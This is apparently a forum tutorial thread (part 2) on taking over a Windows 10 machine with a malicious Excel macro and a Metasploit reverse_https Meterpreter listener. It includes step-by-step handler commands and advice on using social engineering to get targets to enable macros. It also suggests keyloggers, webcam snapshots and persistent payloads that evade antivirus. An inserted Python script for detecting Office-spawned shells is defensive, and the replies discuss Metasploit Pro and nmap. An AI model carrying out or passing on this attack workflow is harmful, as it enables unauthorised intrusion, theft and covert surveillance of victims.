(How to hack) Windows 10 - Kali Linux 2 Part 2

Nicolandia15

Welcome to Part 2 of How to Own Windows 10 using Kali Linux with Metasploit and Veil Evasion

Step 8:
Let's enable the Developer tab in Excel. I'm currently using Excel 2013.
File > Options > Customize Ribbon, then on the right side just check Developer, just like in the screenshot.

After that, click the Developer tab, then Visual Basic

Then paste the shell we made previously. It looks like this

Save the file. To make it more effective, put some random text in the Excel file. It looks suspicious if it's just empty.

Step 9:
Back in Kali, let's set up the listener.
Type
Code:
msfconsole
Load the handler
Code:
use exploit/multi/handler
Load the PAYLOAD
Code:
set PAYLOAD windows/meterpreter/reverse_https
Set LHOST again using your local IP, or your public IP if you want to do this over WAN

Optional:
Code:
show options
Just to make sure nothing is wrong

Step 10:
Start the listener
Code:
exploit -j

At this point, I assume you've already sent the Excel file to the target. Make sure the listener is already running before they open it, just to make sure we get a Meterpreter session. They also need to enable macros in the Excel file they received. A pop-up will appear when they open the file; just add instructions to be sure (Social Engineering baby!)

Once the target opens the file, type this to interact. Disregard the yahoo! in the screenshot. That's just a local IP, since I targeted my other machine connected to the same network. Just replace it with your public IP if you want it to work over WAN
Code:
sessions -i 1

There you go! It's up to you after that. The point is we now have access. As long as the Excel file is open, we have a session. You can run any other Meterpreter code or upload another exploit like a keyboard sniffer. But my favorite is webcam snap. It takes a snapshot if the target has a webcam in use.

Again. After the session I ran a full scan using Avira and it was clean, it didn't find anything. The shell sits in memory btw. If you check the processes in Windows, you'll see a terminal open, so if you don't remember opening that, then somebody is accessing your machine remotely. What to do? Close the file, then reinstall. So far that's the best defense.

FAQ:
Q: Is the payload persistent?
A: Nope. Once the file is closed, the session closes. So once you have a session, use another Meterpreter payload that is persistent and hope the antivirus doesn't catch it.
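The indicator the post describes (a command shell showing up while the macro-enabled workbook is open) can be checked automatically. This Python script is an added example, not part of the original post: it walks a constructed list of process records (PID, parent PID, image name, the fields a Sysmon Event ID 1 export or a `Get-CimInstance Win32_Process` listing gives you) and reports every shell or script host whose ancestry leads back to an Office application.

```python
"""Flag shell/script-host processes whose ancestor is an Office application.

Input is a list of (pid, ppid, image) tuples. The sample below is constructed
for this example and mirrors the indicator from the post: EXCEL.EXE with a
macro enabled spawns a command shell that hosts the in-memory stager.
"""

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
               "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def find_office_spawned_shells(procs):
    """Return a list of (shell_pid, chain) where chain is the image names
    from the Office ancestor down to the shell, e.g. ['excel.exe', 'cmd.exe']."""
    by_pid = {pid: (ppid, image.lower()) for pid, ppid, image in procs}
    hits = []
    for pid, (ppid, image) in by_pid.items():
        if image not in SHELL_HOSTS:
            continue
        chain = [image]
        cur = ppid
        seen = set()
        while cur in by_pid and cur not in seen:
            seen.add(cur)  # guard: PID reuse can make the parent links loop
            parent_ppid, parent_image = by_pid[cur]
            chain.append(parent_image)
            if parent_image in OFFICE_APPS:
                hits.append((pid, list(reversed(chain))))
                break
            cur = parent_ppid
    return hits


# Constructed sample process table: (pid, ppid, image)
SAMPLE_PROCS = [
    (4, 0, "System"),
    (600, 4, "winlogon.exe"),
    (1200, 600, "explorer.exe"),
    (3100, 1200, "EXCEL.EXE"),       # user opened the macro-enabled workbook
    (3404, 3100, "cmd.exe"),         # macro-launched shell: the indicator
    (3520, 3404, "powershell.exe"),  # stager running under that shell
    (2200, 1200, "cmd.exe"),         # benign: launched by the user from Explorer
    (2300, 1200, "powershell.exe"),  # benign
]

if __name__ == "__main__":
    for pid, chain in find_office_spawned_shells(SAMPLE_PROCS):
        print(f"PID {pid}: {' -> '.join(chain)}")
```

Only processes whose ancestor chain reaches an Office image are reported; shells the user started from Explorer are left alone, and the `seen` set keeps a recycled PID from turning the walk into an infinite loop.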
 
What's the difference between the Metasploit license and the framework that comes with Kali?

There's no notable difference between what's in Pro versus the Community Edition, though there are a few. For veteran pentesters who use Pro, it makes their lives easier because the Pro Edition is more organized; there are a few added tools, organized reports, web app scanning, bruteforce credentials and such.

There are still pros who use the Community Edition. And take note, Metasploit Pro? $7000 price tag. Unless you work for a big company, nobody is buying that. :)
 
Anyway, I already gave a brief explanation in my reply of what's in Pro. Here's more:
  • Wizards for standard baseline audits
  • Task chains for automated custom workflows
  • MetaModules for discrete tasks such as network segmentation testing
  • Dynamic payloads to evade leading anti-virus solutions
  • Full access to an internal network through a compromised machine with VPN pivoting
  • Closed-loop vulnerability validation to prioritize remediation
  • Phishing awareness management & spear phishing
  • Web app testing for OWASP Top 10 vulnerabilities
  • Choice of advanced command-line (Pro Console) and web interface
  • Integrations via Remote API

Source: Rapid7
 
What I mean is, why is that software so expensive when there's an open source one with only a small difference... also, could I get some help with my port, hehe, off topic
 
Metasploit is licensed, and the Community Edition is the more popular one anyway; it isn't expensive if you run a big company and the security of your data or website is what matters most to you. As always, off topic. Just PM me. :)
 
I have a request, sir/ma'am, about nmap and proxychains. I'm confused by OS detection: I scanned my own IP but Linux came up. I'm on VirtualBox, Windows 8.1, my network adapter is a bridged adapter, and with proxychains I'd like to tunnel it through TOR.
 